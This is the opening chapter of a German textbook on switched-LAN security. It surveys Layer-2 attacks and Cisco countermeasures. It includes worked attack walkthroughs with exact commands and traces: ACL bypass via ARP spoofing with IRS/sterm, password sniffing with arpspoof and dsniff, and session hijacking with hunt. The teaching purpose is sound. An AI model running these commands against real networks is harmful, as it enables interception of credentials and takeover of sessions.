1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen

1 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen 1.1 Überblick über die Schwachstellen Bei der Beurteilung der Schwachstellen von lokalen Netzwerken sollte man zuerst die Unterschiede zwischen Shared und Switched Ethernet kennen, da Shared-Ethernet- Umgebungen wesentlich»anfälliger«für Angriffe sind als geswitchte LANs. 1.1.1 Shared und Switched Ethernet Shared Ethernet Das ursprüngliche Ethernet-Protokoll basiert auf einer Bus-Topologie, bei der alle Maschinen des lokalen Netzwerks im Prinzip an einem gemeinsam genutzten Bus angeschlossen sind und dadurch den gesamten Datenverkehr sehen können. In diesem Fall werden die einzelnen physikalischen Kabel über so genannte Hubs verbunden, die jedes empfangene Paket an alle verfügbaren Ports weiterleiten. Normalerweise ignorieren die Ethernet-Controller Pakete, die nicht für sie bestimmt sind. Es ist jedoch möglich, die Schnittstelle in den so genannten»promiscuous mode«zu setzen, bei dem der Controller alle Pakete aufnimmt. Dadurch kann ein Angreifer den gesamten Datenverkehr innerhalb des lokalen Ethernet mit den entsprechenden Programmen aufzeichnen, ohne weitere Vorkehrungen treffen zu müssen. Aus diesem Grund gibt es in einer Shared-Ethernet-Umgebung eigentlich keinen wirksamen Schutz gegen LAN-basierende Attacken. Ethernet-Schnittstelle filtert Pakete, die nicht für sie bestimmt sind. Ethernet-Schnittstelle filtert Pakete, die nicht für sie bestimmt sind. Zielsystem 00-00-F8-31-A4-2D Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben. Paket zum Zielsystem 08-00-2B-01-02-03 Angreifer Sender Switched Ethernet In heutigen Ethernet-Umgebungen werden jedoch hauptsächlich Switches eingesetzt, die Pakete nur an die Ports weiterleiten, an denen die MAC-Adresse des Zielsystems

2 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen eingetragen ist. Dazu unterhält der Switch eine MAC-Adresstabelle (bei den Catalyst Switches auch als CAM-Tabelle (Content Addressable Memory) bezeichnet), in der er Informationen über die physikalischen Adressen, die über einen Switch-Port zu erreichen sind, mit den zugehörigen VLAN-Parametern abspeichert. Diese Adresstabelle kann auf den verschiedenen Switchtypen eine unterschiedliche Größe haben (z. B. über 130.000 Einträge auf einem Catalyst 6000 oder nur 2000 auf einem Catalyst 2950XL). Sobald die Tabelle aufgefüllt ist, kann der Switch keine neuen MAC- Adressen mehr eintragen und muss Pakete, die für unbekannte Ethernet-Adressen bestimmt sind, über alle Ports weiterleiten. Diese Pakete werden dadurch innerhalb des kompletten Layer-2-Netzwerks geflutet (so genanntes Unicast Flooding) und sind daher auch für einen potenziellen Angreifer sichtbar. MAC-Adresse des Zielsystems ist nicht in der Tabelle des Switch eingetragen Falls der Switch die Zieladresse nicht kennt, flutet er das Paket über alle aktiven Ports (Flooding) und verhält sich dadurch wie ein Hub. Ein potenzieller Angreifer ist dann problemlos in der Lage, das Paket zu sehen. Port 2/17 Zielsystem 00-00-F8-31-A4-2D Zieladresse ist nicht in der MAC- Adresstabelle eingetragen. Das heißt, der Switch flutet das Paket über alle Ports. Port Fa0/24 Zieladresse ist nicht in der MAC- Adresstabelle eingetragen. Das heißt, der Switch flutet das Paket über alle Ports. Paket zum Zielsystem 00-00-F8-31-A4-2D Sender 08-00-2B-05-67-87 Aufbau der MAC-Adresstabelle Falls der Switch ein Paket empfängt, dessen Quelladresse er noch nicht kennt, legt er für den Port und die Adresse einen neuen Eintrag in der MAC-Adresstabelle an. Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein. Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein. Port 2/17 Sender 00-00-F8-31-A4-2D Port Fa0/24 Zielsystem 08-00-2B-05-67-87

1.2 Überblick über die verschiedenen LAN-Attacken 3 cat5000> (enable) show cam 00:00:F8:31:a4:2d VLAN Dest MAC/Route Des Destination Ports or VCs / [Protocol Type] ---- ------------------ ------------------------------------------ 1 00-00-f8-31-a4-2d 2/17 [ALL] Total Matching CAM Entries Displayed = 1 cat2924c-xl# show mac-address-table address 0000.F831.A42D Non-static Address Table: Destination Address Address Type VLAN Destination Port ------------------- ------------ ---- -------------------- 0000.f831.a42d Dynamic 1 FastEthernet0/24 MAC-Adresse des Zielsystems ist in der Tabelle des Switch eingetragen Ist die Zieladresse in der MAC-Adresstabelle enthalten, leitet der Switch das Paket nur noch an den eingetragenen Port weiter. In diesem Fall kann das Paket von einem potenziellen Angreifer nicht mehr gesehen werden. Switch filtert Paket. Switch filtert Paket. Port 2/17 Zielsystem 00-00-F8-31-A4-2D Port Fa0/24 Paket zum Zielsystem 00-00-F8-31-A4-2D Sender 08-00-2B-05-67-87 Daher versucht bei LAN-basierenden Attacken der Angreifer zuerst, die Switches des lokalen Netzwerks so zu manipulieren, dass sie Pakete, die eigentlich nicht für ihn bestimmt sind, doch zu seinem Port weiterleiten. 1.2 Überblick über die verschiedenen LAN-Attacken Passive Monitoring (Ethernet Sniffing, Eavesdropping) Passive Monitoring (Ethernet Sniffing, Eavesdropping) nennt man Attacken, bei denen ein Angreifer versucht, den Datenverkehr auf dem lokalen Netzwerk abzuhören, um daraus interessante Informationen wie Benutzernamen, Passwörter oder SNMP-Community-Strings herauszufiltern. Bekannte Programme in diesem Bereich sind z. B. dsniff 1, Ettercap 2 oder Cain & Abel 3. Passive Monitoring wird häufig eingesetzt, um darauf aufbauend weitere Angriffe durchzuführen (z. B. DNS Spoofing). 1. dsniff: http://monkey.org/~dugsong/dsniff/ 2. ettercap: http://ettercap.sourceforge.net/ 3. cain & abel: http://www.oxid.it

4 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Damit der Angreifer den Datenverkehr auch in einem geswitchten Netzwerk sehen kann, existieren verschiedene Verfahren, die in den nächsten Kapiteln näher erläutert werden. MAC Flooding (Kapitel 2.1) Der Angreifer füllt die MAC-Adresstabelle des Switch auf, damit Pakete über alle Ports geflutet werden müssen. MAC Spoofing (Kapitel 2.2) Der Angreifer verwendet die MAC-Adresse des Systems, das er angreifen möchte. ARP Spoofing (auch als ARP Cache Poisoning bezeichnet) (Kapitel 4.2) Der Angreifer sendet falsche ARP-Pakete, um den ARP Cache auf den angegriffenen Systemen zu modifizieren. VLAN-Attacken (Kapitel 7) Der Angreifer baut eine Trunk-Verbindung zum Switch auf. Spanning-Tree-Attacken (Kapitel 9) Unter bestimmten Umständen kann der Angreifer die Spanning-Tree-Topologie ändern. ICMP Redirect (Kapitel 10.1) Der Angreifer leitet durch ICMP Redirects den Datenverkehr zu seinem Rechner um. ICMP Router Advertisements (Kapitel 10.2) Der Angreifer ändert durch ICMP Router Advertisements das Default Gateway auf den Hosts. HSRP- oder VRRP-Angriffe (Kapitel 11 und 12) Der Angreifer übernimmt die Rolle des Active Router und leitet dadurch die Daten zu seinem Rechner um. Rogue DHCP-Server (Kapitel 13.2.2) Der Angreifer betreibt einen eigenen DHCP-Server und»versorgt«die DHCP- Clients mit falschen Informationen für das Default Gateway und den DNS- Server. Für Passive Monitoring ist es notwendig, dass sich die Ethernet-Schnittstelle des angreifenden Rechners im Promiscuous Mode befindet. Da die so genannten Sniffer- Programme oft auf einem normalen Computer laufen (z. B. unter Windows oder

1.2 Überblick über die verschiedenen LAN-Attacken 5 Linux), gibt es verschiedene Methoden zu überprüfen, ob auf einem Interface der Promiscuous Mode eingeschaltet ist oder nicht. Diese Verfahren funktionieren jedoch nicht, wenn man dedizierte Sniffer-Hardware einsetzt. Ping-Methode In diesem Fall wird ein ICMP Echo Request mit einer nicht vorhandenen MAC- Adresse zu der verdächtigen IP-Adresse gesendet. Falls sich das Interface im Promiscuous Mode befindet, wird der Rechner das Paket annehmen und einen ICMP Echo Reply zurückschicken. Dieses Verfahren kann im Prinzip auf alle anderen Protokolle erweitert werden, die eine Antwort auf ein bestimmtes Paket zurücksenden (z. B. TCP SYN/ACK auf ein TCP SYN oder ein ICMP Error auf ein ungültiges Paket). ARP-Methode Bei diesem Verfahren wird ein ARP Request zu einer nicht existierenden MAC- Adresse gesendet. Falls das System mit einem ARP Reply antwortet, befindet sich der Controller im Promiscuous Mode. DNS-Methode Da viele Sniffer-Programme ein automatisches DNS-Lookup von IP-Adressen durchführen, kann man den DNS-Verkehr des verdächtigen Rechners auf entsprechende Pakete überwachen. Diese Methoden sind jedoch allgemein bekannt und es gibt wiederum verschiedene Möglichkeiten, wie ein Angreifer das Versenden dieser verdächtigen Pakete unterbinden kann (z. B. über das Definieren von Filtern). DoS-Attacken Bei Denial-of-Service-Attacken versucht der Angreifer im Prinzip das lokale Netzwerk oder Teile davon so zu manipulieren, dass kein Datentransfer mehr möglich ist. Folgende LAN-basierende Angriffe können für DoS-Attacken eingesetzt werden: ARP Spoofing (Kapitel 4.2) Der ARP Cache wird mit nicht vorhandenen MAC-Adressen abgeändert. MAC Flooding/MAC Storm (Kapitel 2.1) Der Angreifer»flutet«sehr viele unterschiedliche MAC-Adressen bzw. Pakete über einen Port. MAC Spoofing (Kapitel 2.2) Der Angreifer verwendet eine doppelte MAC-Adresse.

6 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen VTP-Attacken (Kapitel 7.3) Der Angreifer modifiziert die aktiven VLANs mit Hilfe des Cisco-VTP-Protokolls (VLAN Trunking Protocol). STP-Attacken (Kapitel 9.2) Änderungen in der Topologie führen zu einer permanenten Neuberechnung des Spanning Tree. ICMP Redirects (Kapitel 10.1) Das Gateway für bestimmte Hosts wird auf eine nicht existierende Adresse abgeändert. ICMP Router Discovery (Kapitel 10.2) Das Default Gateway wird auf eine nicht existierende Adresse abgeändert. HSRP- oder VRRP-Angriffe (Kapitel 11 und 12) Das Default Gateway wird auf eine nicht existierende Adresse abgeändert. Rogue DHCP-Server (Kapitel 13.2.2) Es wird ein eigener DHCP-Server verwendet, der falsche Informationen vergibt (IP-Adresse des Clients, Default Gateway und/oder DNS- bzw. WINS-Server). DHCP Starvation (Kapitel 13.2.1) Es werden alle verfügbaren IP-Adressen vom DHCP-Server angefordert. MitM-Attacken Bei Man-in-the-Middle-Attacken»klinkt«sich der Angreifer als»dritte Person«in eine Verbindung ein und fängt die übertragenen Daten ab, um sie dann ggf. zu modifizieren und anschließend an den Empfänger weiterzuleiten. MitM-Attacken bieten zudem die Möglichkeit, verschlüsselte Verbindungen (wie SSH oder SSL) zu dechiffrieren. A B AX

1.3 Überblick über die verschiedenen Schutzmaßnahmen 7 Die folgenden LAN-basierenden Angriffe ermöglichen MitM-Attacken: ARP Spoofing (Kapitel 4.2) ARP Cache für bestimmte IP-Adressen auf die MAC-Adressen des Angreifers abändern. Spanning-Tree-Attacken (Kapitel 9.3) Der Angreifer»klinkt«sich als Root Bridge in die Spanning-Tree-Topologie ein (Voraussetzung ist aber die Verbindung zu mindestens zwei Switches). ICMP Redirects (Kapitel 10.1) Das Gateway für bestimmte Hosts wird auf die IP-Adresse des Angreifers abgeändert. ICMP Router Discovery (Kapitel 10.2) Das Default Gateway wird auf die IP-Adresse des Angreifers abgeändert. HSRP- oder VRRP-Angriffe (Kapitel 11 und 12) Das Default Gateway wird auf die IP-Adresse des Angreifers abgeändert. Rogue DHCP-Server (Kapitel 13.2.2) Der gefälschte DHCP-Server übergibt den Clients als Default Gateway die Adresse des Angreifers. 1.3 Überblick über die verschiedenen Schutzmaßnahmen Die Schwachstellen innerhalb eines Netzwerks, Computersystems oder Programms, die für einen potenziellen Angriff ausgenutzt werden können, bezeichnet man oft als Vulnerabilities, die Verfahren und Mechanismen, wie man sich gegen diese Angriffe schützen bzw. sie»abschwächen«kann, als Mitigation. MAC-Angriffe MAC Spoofing Mitigation Catalyst Port Security (siehe Kapitel 3) Statischer Eintrag für kritische Systeme in der MAC-Adresstabelle MAC Flooding Mitigation Catalyst Port Security (siehe Kapitel 3) Unicast-Flooding unterbinden (siehe Kapitel 3.3)

8 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Spanning-Tree und VLAN-Angriffe Root und BPDU Guard (siehe Kapitel 9.4) DTP auf allen Ports ausschalten, die nicht mit anderen Switches verbunden sind VTP ausschalten (siehe Kapitel 7.3.3) ARP Spoofing Mitigation Allgemeine Verfahren Intrusion-Detection-Systeme (IDS), die hohe Rate von ARP-Paketen erkennen Catalyst Port Security (falls der Angreifer fiktive MAC-Adressen benutzt) Statische ARP-Einträge für Router/Firewall (auf den Hosts, siehe Kapitel 4.2) und kritische Server (auf Router/Firewall) Layer-3-Trennung (siehe Kapitel 6.2.5) Unterbinden der Host-zu-Host-Kommunikation Private VLANs (siehe Kapitel 5) VLAN ACLs gegen Intra-Subnetz-Routing (siehe Kapitel 6.1.1) Router-zu-Host-Kommunikation Überprüfung der ARP-Pakete durch ARP Inspection (siehe Kapitel 6.2.4) Sticky ARP (Catalyst 6500 Switch mit MSFC-Routerkarte; siehe Kapitel 6.2.2) DHCP Secured IP Address Assignment (IOS; siehe Kapitel 6.2.3) IP-basierende Angriffe IP Spoofing Mitigation Anti-IP-Spoofing Filter (siehe Kapitel 14.1) Unicast Reverse Path Forwarding (siehe Kapitel 14.3) IP Source Guard (siehe Kapitel 14.4.1) ICMP-basierende Angriffe ICMP-Redirect-Pakete auf den Hosts ignorieren ICMP-Router-Discovery-Protokoll auf den Hosts nicht einschalten ICMP-Router-Advertisement und Redirect-Pakete auf den Switches filtern DHCP-basierende Angriffe Catalyst Port Security (siehe Kapitel 3) DHCP Snooping (siehe Kapitel 13.3.2) VLAN ACL Redirects und per-port ACLs (siehe Kapitel 13.3.1)

1.4 Beispiele für verschiedene LAN-Angriffe 9 HSRP- und VRRP-basierende Angriffe IGMP-Filter auf den Switches (siehe Kapitel 11.4.3) MD5-Authentifizierung der HSRP-Pakete (siehe Kapitel 11.4.2) Konfigurationsrichtlinien für VRRP beachten (siehe Kapitel 12.4) 1.4 Beispiele für verschiedene LAN-Angriffe Das folgende Kapitel beschreibt exemplarisch einige Angriffe, die zeigen, wie einfach man Passwörter aus dem Datenstrom herausfiltern kann oder wie man verschlüsselte SSH- oder SSL-Verbindungen»knacken«kann, ohne jetzt schon näher auf die einzelnen Techniken einzugehen. 1.4.1 Zugriffsliste eines Routers umgehen In diesem Beispiel wird mit Hilfe der Programme IRS und sterm 4 die Zugriffsliste eines Routers umgangen, über die der Telnet/SSH-Zugriff auf bestimmte IP-Adressen beschränkt wird. Konfiguration des Routers Default Gateway IP: 10.185.208.190 Angreifer IP: 10.185.208.10 MAC: lokal (00-D0-59-05-95-09) MAC: gespooft (00-11-22-33-44-55) Management-Stationen IP: 10.185.208.189 IP: 10.185.208.175 hostname c1720! interface FastEthernet0 description -- Inside Interface zum lokalen Netzwerk -- ip address 10.185.208.190 255.255.255.0! access-list 101 permit tcp host 10.185.208.189 any eq telnet log-input access-list 101 permit tcp host 10.185.208.189 any eq 22 log-input Die Zugriffsliste gibt Telnet und SSH nur für die IP-Adressen 10.185.208.189 und 10.185.208.175 frei. 4. IRS und sterm: http://www.oxid.it/projects.html

10 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen access-list 101 permit tcp host 10.185.208.175 any eq telnet log-input access-list 101 permit tcp host 10.185.208.175 any eq 22 log-input! line vty 0 4 access-class 101 in password c login c1720# show arp Protocol Address Age (min) Hardware Addr Type Interface Internet 10.185.208.175 139 0000.f808.3daf ARPA FastEthernet0 Internet 10.185.208.190-0004.c17d.d654 ARPA FastEthernet0 Internet 10.185.208.189 0 0000.f831.a42d ARPA FastEthernet0 Testen der Router ACL mit IRS Mit Hilfe des Programms IRS kann man zunächst ermitteln, welche Hosts überhaupt auf den Router zugreifen dürfen. IRS arbeitet dabei folgendermaßen: 1. Es sendet ARP Replies mit der lokalen Ethernet-Adresse und der gespooften IP- Adresse zum Router. 2. Zun Aufbau einer Telnet-Verbindung schickt IRS TCP/SYN-Paket für Port 23 zum Router. 3. Falls der Router mit einem SYN/ACK antwortet, ist diese Adresse durch die Zugriffsliste freigegeben. Der folgende Trace 5 zeigt das Verhalten, wenn die»gespoofte«ip-adresse durch die Router ACL gesperrt ist. IRS überprüft in diesem Auszug die IP-Adresse 10.185.208.154. Falls die getestete IP-Adresse auf dem Router freigegeben ist, wird

1.4 Beispiele für verschiedene LAN-Angriffe 11 auf das TCP/SYN-Paket des Angreifers statt eines RST/ACK ein SYN/ACK zurückgesendet. ARP Spoofing, um ARP Cache auf dem Router zu verändern (Punkt 1) Um einen evtl. bestehenden Eintrag im ARP Cache des Routers zu verändern, sendet IRS für die zu überprüfende IP-Adresse zuerst ein gefälschtes ARP-Reply- Paket mit seiner lokalen MAC-Adresse. Ethernet II, Src: 00:d0:59:05:95:09, Dst: 00:04:c1:7d:d6:54 Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002) Sender MAC address: 00:d0:59:05:95:09 (00:d0:59:05:95:09) Sender IP address: 10.185.208.154 (10.185.208.154) Target MAC address: 00:00:00:00:00:00 (00:00:00:00:00:00) Target IP address: 0.0.0.0 (0.0.0.0) Aufbau der TELNET-Verbindung zum Router (Punkt 2) Ethernet II, Src: 00:d0:59:05:95:09, Dst: 00:04:c1:7d:d6:54 Internet Protocol, Src Addr: 10.185.208.154, Dst Addr: 10.185.208.190 Transmission Control Protocol, Src Port: 386 (386), Dst Port: telnet (23) Source port: 386 (386) Destination port: telnet (23) Sequence number: 9961 IRS sendet TCP/SYN-Paket zum Header length: 20 bytes Port 23 des Routers. Flags: 0x0002 (SYN) Window size: 4096 Checksum: 0xc095 (correct) Antwort des Routers (Punkt 3) Falls der Zugriff über eine ACL geschützt ist, sendet der Router ein RST-Paket an den Angreifer zurück. Dadurch weiß IRS, dass Telnet-Verbindungen von dieser IP-Adresse gesperrt sind. Ethernet II, Src: 00:04:c1:7d:d6:54, Dst: 00:d0:59:05:95:09 Internet Protocol, Src Addr: 10.185.208.190, Dst Addr: 10.185.208.154 Transmission Control Protocol, Src Port: telnet (23), Dst Port: 386 (386 Source port: telnet (23) Destination port: 386 (386) Sequence number: 0 Acknowledgement number: 9962 Header length: 20 bytes Flags: 0x0014 (RST, ACK) Window size: 0 Checksum: 0xd082 (correct) Falls die IP-Adresse freigegeben wäre, würde der Router statt des RST/ACK ein SYN/ACK-Paket zurücksenden. 5. Sofern nicht anders vermerkt, sind alle Traces in diesem Buch auf einem Linux-System mit dem Programm tethereal erzeugt worden (http://www.ethereal.com).

12 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Router ACL mit sterm umgehen Anschließend wird sterm benutzt, um eine Telnet-Verbindung mit einer»gespooften«ip-adresse zum Router aufzubauen. Vor dem Verbindungsaufbau sendet das Programm zunächst gefälschte ARP Replies mit der lokalen bzw. einer gespooften MAC-Adresse sowie der»gespooften«ip-adresse zum Router. Dadurch wird der ARP Cache des Routers mit der vom Angreifer verwendeten MAC-Adresse überschrieben. Der folgende Trace zeigt die gefälschten ARP- und IP-Pakete, mit denen sterm die Router ACL umgeht. Als IP-Quelladresse benutzt der Angreifer die IP-Adresse 10.185.208.189. ARP Cache auf dem Router modifzieren Damit der Router die von sterm verwendete MAC-Adresse im ARP Cache behält, sendet das Programm in regelmäßigen Abständen ARP Replies für die gespoofte IP- und MAC-Adresse. Ethernet II, Src: 00:11:22:33:44:55, Dst: 00:04:c1:7d:d6:54 Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002)

1.4 Beispiele für verschiedene LAN-Angriffe 13 Sender MAC address: 00:11:22:33:44:55 (00:11:22:33:44:55) Sender IP address: 10.185.208.189 (10.185.208.189) Target MAC address: 00:00:00:00:00:00 (00:00:00:00:00:00) Target IP address: 0.0.0.0 (0.0.0.0) c1720# show arp incl 189 Der Eintrag im ARP Cache ist in diesem Beispiel mit einer gespooften MAC-Adresse überschrieben worden. Internet 10.185.208.189 0 0011.2233.4455 ARPA FastEthernet0 Aufbau der TELNET-Verbindung Anschließend kann sterm eine Telnet-Verbindung zum Router aufbauen. Dabei benutzt es die gespoofte IP- und Ethernet-Adresse. TCP/SYN-Paket des Angreifers Ethernet II, Src: 00:11:22:33:44:55, Dst: 00:04:c1:7d:d6:54 Internet Protocol, Src Addr: 10.185.208.189, Dst Addr: 10.185.208.190 Transmission Control Protocol, Src Port: 13167, Dst Port: telnet (23 Source port: 13167 (13167) Destination port: telnet (23) Sequence number: 41 Header length: 20 bytes Flags: 0x0002 (SYN) Window size: 4096 Checksum: 0xb545 (correct) SYN/ACK-Paket des Routers Ethernet II, Src: 00:04:c1:7d:d6:54, Dst: 00:11:22:33:44:55 Internet Protocol, Src Addr: 10.185.208.190, Dst Addr: 10.185.208.189 Transmission Control Protocol, Src Port: telnet (23), Dst Port: 13167 Source port: telnet (23) Destination port: 13167 (13167) Sequence number: 2035340347 Acknowledgement number: 42 Header length: 24 bytes Flags: 0x0012 (SYN, ACK) Window size: 4128 Checksum: 0x4fcc (correct) Options: (4 bytes) ACK-Paket des Angreifers Ethernet II, Src: 00:11:22:33:44:55, Dst: 00:04:c1:7d:d6:54 Internet Protocol, Src Addr: 10.185.208.189, Dst Addr: 10.185.208.190 Transmission Control Protocol, Src Port: 13167, Dst Port: telnet (23) Source port: 13167 (13167) Destination port: telnet (23) Sequence number: 42 Acknowledgement number: 2035340348 Header length: 20 bytes Flags: 0x0010 (ACK) Window size: 4096 Checksum: 0x67a9 (correct)

14 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Solange der Angreifer keine separate MAC-Adresse verwendet, kann dieser Angriff nicht durch die Catalyst Port Security unterbunden werden, und auch private VLANs bieten wenig Schutz, da der Router in der Regel an einem Promiscuous Port angeschlossen ist und alle Hosts eines Isolated VLAN mit diesem Port kommunizieren können. Von daher müssen in diesem Fall andere Schutzmechanismen eingesetzt werden, um den Angriff abzuwenden: Manuelle Definition von statischen ARP-Einträgen In diesem Fall muss für jeden Host, der auf den Router zugreifen soll, ein statischer ARP-Eintrag definiert werden. Da dies jedoch mit einem hohen Management-Aufwand verbunden ist und schlecht skaliert, sollte man besser andere Verfahren verwenden. Automatische Definition von statischen ARP-Einträgen Sofern es sich bei dem Router um die MSFC-Karte eines Catalyst 6000 handelt, kann man den Sticky-ARP-Mechanismus verwenden, um automatisch die statischen ARP-Einträge zu generieren (siehe Kapitel 6.2.2). Port-basierende ACLs (im Moment nur Catalyst 4500 mit Native IOS) Um die gespooften IP-Adressen direkt an den»nicht-management«-ports zu filtern, kann man eine Port-basierende Zugriffskontrollliste auf dem Switch definieren, die Pakete mit den Management-Adressen verwirft. ip access-list extended BlockSpoofedAddresses deny ip host 10.205.208.189 any deny ip host 10.205.208.175 any permit ip any any! interface name ip access-group BlockSpoofedAddresses in Überprüfung der gefälschten ARP-Pakete durch ARP Inspection Ein weiterer Schutzmechanismus gegen ARP Spoofing ist die dynamische Inspektion der ARP-Pakete durch den Switch (ARP Inspection oder ARP Snooping, siehe Kapitel 6.2.4). 1.4.2 Password Sniffing mit DSNIFF In diesem Beispiel leitet der Angreifer über ARP Spoofing den kompletten Datenverkehr, den der Host 10.185.211.208 zum Default Gateway (10.185.208.190) senden will, zuerst zu seinem Rechner (10.185.208.189) um. Damit nicht alle Hosts des lokalen Netzwerkes ihren ARP Cache verfälschen, verwendet der Angreifer keinen Gratuitous ARP, sondern einen direkten ARP Reply zu der MAC-Adresse des anzugreifenden Rechners.

1.4 Beispiele für verschiedene LAN-Angriffe 15 attack: # arpspoof -t 10.185.211.208 10.185.208.190 Defaul t Gateway IP: 10.185.208.190 / 21 MAC: 00-00-0C-07-AC-7B Angegriffener Rechner IP: 10.185.211.208 / 21 MAC: 00-D0-59-05-95-09 Ohne ein zweites ARP Spoofing sendet der Router die Pakete direkt zum Zielsystem. Angreifer (Host attack) IP: 10.185.208.189 / 21 MAC: 00-60-97-80-9D-D6 Alle gesendeten Pakete gehen über den Angreifer. ARP Reply (IP: 10.185.208.190 MAC: 00-60-97-80-9D-D6) Ethernet II, Destination: 00:d0:59:05:95:09 Source: 00:60:97:80:9d:d6 Type: ARP (0x0806) Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002) Sender MAC address: 00:60:97:80:9d:d6 Sender IP address: 10.185.208.190 Target MAC address: 00:d0:59:05:95:09 Target IP address: 10.185.211.208 Der Angreifer trägt hier seine MAC-Adresse ein. Durch die permanent gesendeten ARP Replies modifiziert der Zielrechner seinen ARP-Eintrag und trägt als MAC-Adresse für das Default Gateway die MAC-Adresse des Angreifers ein. C:\> arp -a Interface: 10.185.211.208 on Interface 2 Internet Address Physical Address 10.185.208.190 00-60-97-80-9d-d6 Durch die permanent gesendeten ARP Replies ist im ARP Cache immer die MAC-Adresse des Angreifers eingetragen. Der Angreifer ist anschließend in der Lage, den kompletten Datentransfer zwischen dem Host 10.185.211.208 und dem Default Gateway mitzuprotokollieren und z. B. über das Programm DSNIFF 6 die Benutzernamen und Passwörter aus dem Datenstrom herauszufiltern. Soll auch der Verkehr zwischen Gateway und Host überwacht werden, muss der Angreifer noch ein ARP Reply zum Gateway senden (arpspoof -t 10.185.208.190 10.185.211.208). attack# dsniff -cn dsniff: listening on eth0 ----------------- 10/28/02 13:16:15 tcp 10.185.211.208.2137 -> 10.204.208.33.23 (telnet) andreas c ena c In diesem Beispiel wurde die Telnet-Verbindung auf einen Router protokolliert und das Login- sowie das Enable-Passwort sind zu sehen. 6. dsniff: http://monkey.org/~dugsong/dsniff/

16 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Um die umgeleiteten Pakete an das Default Gateway weiterleiten zu können, muss der Angreifer auf dem Linux-System IP Forwarding ein- und das Versenden von ICMP Redirects ausschalten. attack# echo "1" > /proc/sys/net/ipv4/ip_forward attack# iptables 7 -t filter -A OUTPUT -p icmp -s 0/0 -d 0/0 -j DROP --icmp-type redirect attack# iptables -vl Chain INPUT (policy ACCEPT 5638 packets, 619K bytes) pkts bytes target prot opt in out source destination Chain FORWARD (policy ACCEPT 19 packets, 1140 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 1674 packets, 192K bytes) pkts bytes target prot opt in out source destination 12 1056 DROP icmp -- any any anywhere anywhere icmp redirect Ohne das Ausschalten der ICMP Redirects würde das Linux-System eine Redirect- Nachricht an den Host senden und als Gateway für die angesprochene Zieladresse den normalen Router eintragen. Neben dem Filtern der Nachrichten durch einen iptables-eintrag kann man das Versenden von ICMP Redirects auf einem Linux- Rechner auch über den folgenden Befehl komplett für eine Schnittstelle ausschalten: attack# echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects Als Schutzmaßnahmen gegen Password Sniffing bieten sich private VLANs an, da sie das Versenden der gefälschten ARP-Pakete in Richtung der anderen Hosts unterbinden und der Angreifer dadurch den Datentransfer der anderen Rechner nicht zu seinem System umleiten kann. 1.4.3 Session Hijacking mit Hunt Bei diesem Beispiel verwendet ein Angreifer das Programm hunt 8, um mit ARP Spoofing eine bestehende TELNET-Verbindung zwischen einem OpenVMS-System und einem IOS-Router zu übernehmen. 7. Weitere Informationen über die Linux-Filter: http://www.netfilter.org/ 8. hunt: http://www.securityfocus.com/tools/834

1.4 Beispiele für verschiedene LAN-Angriffe 17 OpenVMS System 10.185.208.114 IOS-Router 10.185.208.187 Telnet Session zum Router wird vom Angreifer übernommen ARP Reply (IP: 10.185.208.114 MAC: EA:1A:DE:AD:BE:01) ARP Reply (IP: 10.185.208.187 MAC: EA:1A:DE:AD:BE:02) Angreifer ARP Spoofing Um den Angriff durchführen zu können, muss der Angreifer zuerst den ARP Cache auf dem Router und dem Host durch ARP Spoofing modifizieren. Damit die Änderungen nicht wieder durch die richtigen Adressen überschrieben werden, sendet hunt permanent entsprechende ARP Replies. ARP Relay Daemon starten attack# hunt /* * hunt 1.5 * multipurpose connection intruder / sniffer for Linux * (c) 1998-2000 by kra */ starting hunt --- Main Menu --- rcvpkt 2, free/alloc 63/64 ------ l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit *> d --- daemons --- rcvpkt 97, free/alloc 63/64 ------ r) reset daemon a) arp spoof + arp relayer daemon s) sniff daemon m) mac discovery daemon x) return *dm> a

18 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen --- arpspoof daemon --- rcvpkt 138, free/alloc 63/64 ------ s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> s ARP Spoofing für Verbindungen zwischen den beiden Hosts einschalten daemon started --- arpspoof daemon --- rcvpkt 181, free/alloc 63/64 ---Y--- s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> a src/dst host1 to arp spoof> 10.185.208.114 host1 fake mac [EA:1A:DE:AD:BE:01]> src/dst host2 to arp spoof> 10.185.208.187 host2 fake mac [EA:1A:DE:AD:BE:02]> refresh interval sec [0]> ARP Spoofing testen hunt verwendet in diesem Beispiel nicht vorhandene MAC-Adressen für das ARP Spoofing. --- arpspoof daemon --- rcvpkt 785, free/alloc 61/64 ---Y--- s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return 